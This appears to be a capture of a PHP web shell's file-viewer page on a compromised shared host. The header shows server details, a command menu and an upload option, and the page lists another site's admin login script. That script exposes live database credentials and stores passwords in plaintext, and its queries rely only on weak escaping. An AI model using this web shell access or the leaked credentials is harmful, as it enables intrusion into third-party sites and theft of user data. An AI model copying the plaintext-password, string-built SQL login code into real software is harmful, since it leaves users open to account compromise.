|
Server IP : 103.53.40.154 / Your IP : 3.142.156.58 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/abslmnewsnetwork.com/../ltbuildcon.com/admin/ckeditor/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
// connect to database
// $db = mysqli_connect('localhost', 'root', '', 'arcade');
$db = mysqli_connect('localhost', 'ppcad7no_ltbuildcon', '%u4+$RzJOPIW', 'ppcad7no_ltbuildcon');
// variable declaration
$username = "";
$email = "";
$errors = array();
// call the register() function if register_btn is clicked
// if (isset($_POST['register_btn'])) {
// register();
// }
// REGISTER USER
// function register(){
// // call these variables with the global keyword to make them available in function
// global $db, $errors, $username, $email;
// // receive all input values from the form. Call the e() function
// // defined below to escape form values
// $username = e($_POST['username']);
// $email = e($_POST['email']);
// $phone = e($_POST['phone']);
// $password_1 = e($_POST['password_1']);
// $password_2 = e($_POST['password_2']);
// // form validation: ensure that the form is correctly filled
// if (empty($username)) {
// array_push($errors, "Username is required");
// }
// if (empty($email)) {
// array_push($errors, "Email is required");
// }
// if (empty($phone)) {
// array_push($errors, "Mobile Number is required");
// }
// if (empty($password_1)) {
// array_push($errors, "Password is required");
// }
// if ($password_1 != $password_2) {
// array_push($errors, "The two passwords do not match");
// }
// // register user if there are no errors in the form
// if (count($errors) == 0) {
// $name = ($_POST['name']);
// $username = ($_POST['username']);
// $email = ($_POST['email']);
// $phone = ($_POST['phone']);
// $password = ($_POST['password_1']);//encrypt the password before saving in the database
// if (isset($_POST['user_type'])) {
// $user_type = e($_POST['user_type']);
// $query = "INSERT INTO login_tbl (name, username, email, phone, user_type, password)
// VALUES('$name', '$username', '$email', '$phone', '$user_type', '$password')";
// mysqli_query($db, $query);
// $_SESSION['success'] = "New user successfully created!!";
// header('location: home.php');
// }else{
// $query = "INSERT INTO login_tbl (name, username, email, phone, user_type, password)
// VALUES('$name', '$username', '$email', '$phone', 'user', '$password')";
// $result = mysqli_query($db, $query);
// if($result){
// echo ("<script>
// window.alert('Succesfully Submitted');
// window.location.href='register.php';
// </script>");
// mysqli_close($db);
// }
// // echo "submitted";
// // get id of the created user
// // $logged_in_user_id = mysqli_insert_id($db);
// // $_SESSION['user'] = getUserById($logged_in_user_id);
// // put logged in user in session
// // $_SESSION['success'] = "You are now logged in";
// // header('location: ../register.php');
// }
// }
// }
if (isset($_POST['login_btn'])) {
login();
}
// LOGIN USER
function login(){
global $db, $username, $errors;
// grap form values
$username = e($_POST['username']);
$password = e($_POST['password']);
// make sure form is filled properly
if (empty($username)) {
array_push($errors, "Username is required");
}
if (empty($password)) {
array_push($errors, "Password is required");
}
// attempt login if no errors on form
if (count($errors) == 0) {
// $password = md5($password);
// Query for login_tbl
$query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' LIMIT 1;";
$results1 = mysqli_query($db, $query1);
if (mysqli_num_rows($results1) == 1) { // user found in login_tbl
// check if user is admin or user
$logged_in_user = mysqli_fetch_assoc($results1);
if ($logged_in_user['user_type'] == 'supadmin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'admin') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: index.php');
} else if ($logged_in_user['user_type'] == 'user') {
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location: home.php');
} else {
$_SESSION['msg'] = "Invalid user type";
header('location: login.php');
}
} else {
$_SESSION['msg'] = "Invalid username or password";
header('location: login.php');
}
// Query for members
$query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1";
$results2 = mysqli_query($db, $query2);
if (mysqli_num_rows($results2) == 1) {
$logged_in_user = mysqli_fetch_assoc($results2);
$_SESSION['user'] = $logged_in_user;
$_SESSION['success'] = "";
header('location:member_home.php');
}
// No user found in either table
array_push($errors, "Wrong username/password ");
}
}
function isAdmin()
{
if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) {
return true;
}else{
return false;
}
}
// return user array from their id
function getUserById($id){
global $db;
$query = "SELECT * FROM login_tbl WHERE id= $id";
$result = mysqli_query($db, $query);
$user = mysqli_fetch_assoc($result);
return $user;
}
// escape string
function e($val){
global $db;
return mysqli_real_escape_string($db, trim($val));
}
function display_error() {
global $errors;
if (count($errors) > 0){
echo '<div class="error">';
foreach ($errors as $error){
echo $error .'<br>';
}
echo '</div>';
}
}
function isLoggedIn()
{
if (isset($_SESSION['user'])) {
return true;
}else{
return false;
}
}
if (isset($_GET['logout'])) {
session_destroy();
unset($_SESSION['user']);
header("location: login.php");
}
?>